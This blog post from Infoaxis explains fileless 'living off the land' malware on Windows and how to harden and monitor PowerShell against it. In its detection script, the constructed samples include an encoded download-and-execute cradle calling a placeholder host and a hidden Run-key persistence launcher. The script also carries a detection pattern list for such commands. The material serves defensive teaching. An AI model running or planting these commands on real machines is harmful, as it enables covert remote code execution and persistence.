Living off the Land – Fileless Malware

Published On: February 9, 2021

The standard procedure for removing malware is to detect it with antivirus software, attempt to disinfect the asset, scan again, and, if all else fails, re-image the asset to remove all traces of infection. But what happens when you cannot detect the infection for months or even years?

Malware authors and antivirus vendors have been locked in an arms race since the late 1980s, with the malware side trying to stay ahead of detection. That battle has mostly been fought over files stored on the asset's hard drive. If you watch antivirus software while it scans, you'll see it compare your files one at a time against a definitions file: a constantly updated set of signatures for known malware. As the detection tools have become more thorough and complex, so have the means by which malware hides itself.

Sneaking past detection tools

By using fileless malware, attackers have been able to circumvent the most common detection tools. Unlike conventional malware, which is written to disk as an executable or embedded in another program's code, fileless malware lives in the asset's working memory rather than in hard drive storage. That leaves little or nothing of the so-called malware 'footprint' that a file-based scanner relies on finding. 'Fileless' is a relative term: many such implants still keep a small foothold, such as a registry value or scheduled task that relaunches the loader after a reboot, but the working payload itself never lands on disk as a file that can be scanned.

Malicious code still has to be launched by a user action or an automated process. But because the payload is never stored as a file, a scanner that examines files has nothing to match. To make matters worse, fileless malware typically borrows a legitimate program for the job. On Windows a common pattern is a script or document macro that starts PowerShell with an encoded command; PowerShell then pulls or unpacks the next stage straight into memory and, if persistence is wanted, stores a small launcher in the Windows Registry. The results could range from a confidential data leak to the opening stage of a ransomware attack. This use of legitimate, already-installed programs to carry out an attack is called 'living off the land', and it is a growing concern among cybersecurity practitioners.

Interestingly, the most common method of introducing fileless malware is the same as for the common variety: social engineering. Despite the continual development of malware and related tooling, the majority of cyber attacks still begin with human error. This means the largest attack vector for fileless malware is activities such as credential harvesting and phishing. Because of this, the adage holds true that the best offense against fileless malware is a good defense. Given the reduced reliability of traditional detection tools, that defense must focus on two key points: prevention and awareness.

In looking at prevention, the first thing to do is ensure your patching and backup strategies are up to date. Patching closes the software flaws that an initial exploit may rely on, and for a tool such as PowerShell it also matters that the current version is installed: modern PowerShell exposes its script content to the antimalware scan interface (AMSI) and can log every script block it runs, while the legacy 2.0 engine does neither and should be removed. One caveat: living off the land abuses intended functionality rather than bugs, so patching alone will not stop it. The legitimate tools also need to be configured so that their use is logged and, where possible, restricted.
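As an added example (not code from the original article), the following script audits the PowerShell settings just described: whether the legacy 2.0 engine is still present, whether script block, module and transcription logging are enabled by policy, and whether the session runs in Constrained Language mode. It assumes Windows 10 / Server 2016 or later with Windows PowerShell 5.1, run from an elevated session; the function name, check names and finding layout are this example's own.

```powershell
# Added example, not code from the original article: audit the PowerShell
# settings that limit living-off-the-land abuse and give defenders visibility.
# Assumes Windows 10 / Server 2016 or later with Windows PowerShell 5.1, run
# from an elevated session. Function and check names are this example's own.

function Test-PowerShellHardening {
    [CmdletBinding()]
    param()

    $findings = [System.Collections.Generic.List[object]]::new()
    $policy   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Helper: read one policy value, returning $null when the key or value is absent.
    function Get-PolicyValue([string]$SubKey, [string]$Name) {
        $item = Get-ItemProperty -Path (Join-Path $policy $SubKey) -Name $Name -ErrorAction SilentlyContinue
        if ($item) { $item.$Name } else { $null }
    }

    # 1. The legacy 2.0 engine predates AMSI and script block logging; an attacker
    #    who can run "powershell -Version 2" sidesteps both. Remove the feature.
    #    (Get-WindowsOptionalFeature needs elevation; without it the check is skipped.)
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    if ($v2 -and $v2.State -eq 'Enabled') {
        $findings.Add([pscustomobject]@{
            Check = 'PowerShellV2'; Status = 'FAIL'
            Fix   = 'Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root'
        })
    }

    # 2. Script block logging writes the de-obfuscated text of every script block
    #    (Event ID 4104 in Microsoft-Windows-PowerShell/Operational), including the
    #    contents of -EncodedCommand payloads, which is what EDR and SIEM need to see.
    if ((Get-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging') -ne 1) {
        $findings.Add([pscustomobject]@{
            Check = 'ScriptBlockLogging'; Status = 'FAIL'
            Fix   = "New-Item -Force '$policy\ScriptBlockLogging' | Out-Null; Set-ItemProperty '$policy\ScriptBlockLogging' EnableScriptBlockLogging 1 -Type DWord"
        })
    }

    # 3. Module logging (Event ID 4103) records pipeline execution details per module.
    if ((Get-PolicyValue 'ModuleLogging' 'EnableModuleLogging') -ne 1) {
        $findings.Add([pscustomobject]@{
            Check = 'ModuleLogging'; Status = 'FAIL'
            Fix   = "New-Item -Force '$policy\ModuleLogging\ModuleNames' | Out-Null; Set-ItemProperty '$policy\ModuleLogging' EnableModuleLogging 1 -Type DWord; Set-ItemProperty '$policy\ModuleLogging\ModuleNames' '*' '*'"
        })
    }

    # 4. Transcription keeps a plain-text record of every interactive session.
    if ((Get-PolicyValue 'Transcription' 'EnableTranscripting') -ne 1) {
        $findings.Add([pscustomobject]@{
            Check = 'Transcription'; Status = 'WARN'
            Fix   = "New-Item -Force '$policy\Transcription' | Out-Null; Set-ItemProperty '$policy\Transcription' EnableTranscripting 1 -Type DWord"
        })
    }

    # 5. Full Language mode lets any script reach .NET reflection and Win32 APIs,
    #    which in-memory loaders depend on. Constrained Language mode, enforced by
    #    an AppLocker or WDAC policy, blocks those paths for untrusted scripts.
    if ($ExecutionContext.SessionState.LanguageMode -ne 'ConstrainedLanguage') {
        $findings.Add([pscustomobject]@{
            Check = 'LanguageMode'; Status = 'WARN'
            Fix   = 'Deploy an AppLocker or WDAC policy so untrusted scripts run in ConstrainedLanguage mode'
        })
    }

    return $findings
}

Test-PowerShellHardening | Format-Table Check, Status, Fix -AutoSize -Wrap
```

An empty result means every check passed. The Fix column holds the local registry commands; in a domain the same values are normally set through Group Policy under Administrative Templates, Windows Components, Windows PowerShell, and the registry paths above are where that policy lands.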

Other preventative measures

Another important preventative measure is endpoint detection and response (EDR), which provides continuous monitoring. This monitoring looks for malicious behaviour rather than file footprints. For example, if a fileless malware attack forces PowerShell to make repeated changes to the Windows Registry, EDR can recognise that sequence of events even though no malicious file exists. However, this monitoring generates a lot of log data, so it is prudent to pair EDR with a reputable Security Information and Event Management (SIEM) system. This allows you to sift through the log data quickly to find the system events indicative of an attack.
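The PowerShell abuse described above (an encoded command that loads its payload into memory and plants a launcher in the registry) and the EDR/SIEM rule that would catch it can be shown together. The script below is an added example, not code from the original article or from any EDR vendor: it scores PowerShell command lines against a small table of living-off-the-land indicators, decoding any -EncodedCommand payload first so that what is hidden inside it is scored too. The indicator table, weights, threshold and the four sample command lines are all this example's own constructions.

```powershell
# Added example, not code from the original article: score PowerShell command
# lines for living-off-the-land indicators, the kind of rule an EDR or SIEM
# would apply to process-creation events (4688 / Sysmon 1) or script block
# logs (4104). Indicator table, weights and sample lines are constructed here.

$Indicators = @(
    [pscustomobject]@{ Name = 'EncodedCommand';    Weight = 3; Pattern = '(?i)(^|\s)-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{16,}' }
    [pscustomobject]@{ Name = 'HiddenWindow';      Weight = 1; Pattern = '(?i)-w(indowstyle)?\s+hidden' }
    [pscustomobject]@{ Name = 'NoProfile';         Weight = 1; Pattern = '(?i)-nop(rofile)?\b' }
    [pscustomobject]@{ Name = 'BypassPolicy';      Weight = 1; Pattern = '(?i)-ex(ecutionpolicy)?\s+bypass' }
    [pscustomobject]@{ Name = 'InvokeExpression';  Weight = 2; Pattern = '(?i)\b(iex|invoke-expression)\b' }
    [pscustomobject]@{ Name = 'DownloadCradle';    Weight = 3; Pattern = '(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient' }
    [pscustomobject]@{ Name = 'RunKeyPersistence'; Weight = 3; Pattern = '(?i)currentversion\\run' }
    [pscustomobject]@{ Name = 'ReflectiveLoad';    Weight = 3; Pattern = '(?i)\[reflection\.assembly\]::load|virtualalloc|createthread' }
)

function Get-DecodedCommand {
    # -EncodedCommand (also -e, -ec, -enc) carries a base64-encoded UTF-16LE script.
    # Decode it so indicators hidden inside the payload are visible to the scorer.
    param([string]$CommandLine)
    if ($CommandLine -match '(?i)(?:^|\s)-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }   # not valid base64: the raw line is still scored
    }
    return $null
}

function Measure-CommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    $decoded = Get-DecodedCommand -CommandLine $CommandLine
    $text    = if ($decoded) { $CommandLine + "`n" + $decoded } else { $CommandLine }
    $hits    = @($Indicators | Where-Object { $text -match $_.Pattern })
    $score   = 0
    foreach ($h in $hits) { $score += $h.Weight }
    [pscustomobject]@{
        Score       = $score
        Indicators  = ($hits | ForEach-Object { $_.Name }) -join ','
        Decoded     = $decoded
        CommandLine = $CommandLine
    }
}

function Find-SuspiciousCommand {
    # Returns every line whose indicator score reaches the threshold. One weak
    # indicator on its own (-NoProfile on an admin's backup script) should not
    # alert; several together, or a decoded download cradle, should.
    param([string[]]$Lines, [int]$Threshold = 5)
    $Lines | ForEach-Object { Measure-CommandLine -CommandLine $_ } |
        Where-Object { $_.Score -ge $Threshold }
}

# Constructed sample command lines (not captured telemetry). The first is the
# classic encoded download cradle; the second plants a Run-key launcher whose
# script lives in a registry value rather than a file; the last two are benign.
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage.ps1")'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$Samples = @(
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand $encoded"
    'powershell.exe -nop -w hidden -c "Set-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Updater -Value ''powershell -nop -w hidden -c iex (gp HKCU:\Software\Classes\Updater).Stage''"'
    'powershell.exe -NoProfile -File C:\Scripts\Backup-Shares.ps1'
    'powershell.exe -Command Get-Service -Name Spooler'
)

# Only the first two samples reach the threshold (scores 10 and 7).
Find-SuspiciousCommand -Lines $Samples | Format-Table Score, Indicators, CommandLine -AutoSize -Wrap
```

The first sample scores on the raw line (-NoProfile, hidden window, encoded command) and again on the decoded payload (Invoke-Expression, download cradle), which is the point of decoding before matching: an EDR or SIEM rule that only inspects the visible command line misses the download cradle entirely. To run this against a live host, feed it the CommandLine field of Security event 4688 (with the "Include command line in process creation events" audit policy enabled) or the ScriptBlockText of PowerShell Operational event 4104, which script block logging must be turned on to produce.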

Even if an attack is detected, correcting the issue can be difficult. Like common malware, fileless malware works by modifying your system to achieve the intended breach or disruption, and in the process the asset or the data it contains could be corrupted. Therefore, having up-to-date, ready-to-deploy backups is an important preventative measure. If you do find that fileless malware has struck, a full re-image is the only sure-fire way to make certain it has no lingering effect: a reboot clears the payload from memory, but not whatever persistence it left behind in the registry or scheduled tasks to bring it back. The only way to carry out such a purge safely is to have adequate backups ready to deploy as quickly as possible.

Cybersecurity training is critical

As fileless malware threats continue to grow, prevention rather than detection is the more likely way to stop an eventual attack. Though patching and backups help keep your assets secure, even the best technical plan can be undone by one well-placed phishing e-mail. Fileless malware may be harder to detect than the common variety, but it still uses the same attack vectors to reach its target.

Industry surveys regularly attribute the large majority of breaches, often cited at around 90%, to some form of social engineering, which is why cybersecurity awareness must be part of your defense strategy. Training employees to recognise suspicious activity, and to feel comfortable reporting it, is a critical step in stopping malware. Employees should understand that reporting activity, even when it means admitting fault, is important to protecting the company's cyber assets. An employee keeping an accidental click on a phishing e-mail to themselves could be as dangerous as the malware itself.

An uptick in fileless malware

Fileless malware has been around much longer than many realize; it is only recently that cybersecurity practitioners have seen an uptick in its use. It is not easy to deploy and harder to keep in place, given the volatility of computer memory. However, we have now reached a point where traditional malware no longer seems to be enough for attackers. They need new tricks to stay hidden, and 'living off the land' seems like a perfect way to do it.

Fileless malware is hard to detect and even harder to mitigate, since you may not be sure what changes it has made to your legitimate programs and processes. This is why it is important to approach the problem from the technological perspective as well as from the perspective of your front-line users. There may be no sure-fire way to prevent an infection, but a forward-thinking prevention and awareness program can keep your company safe and your employees productive.

Discover your system’s vulnerabilities before cyber criminals do

Infoaxis has long operated with a security first mindset. Discovery is the first step in our Cybersecurity Roadmap to your organization becoming more secure. Take our no-cost Discovery assessment and get a comprehensive view of your current vulnerabilities, not just in your organization's network but across your entire business.

About the Author:

Joshua Silberman, CISSP, CCSP, CISA, is a cybersecurity leader responsible for the direction, design, and development of Cloud Transformation and Cybersecurity at Infoaxis.
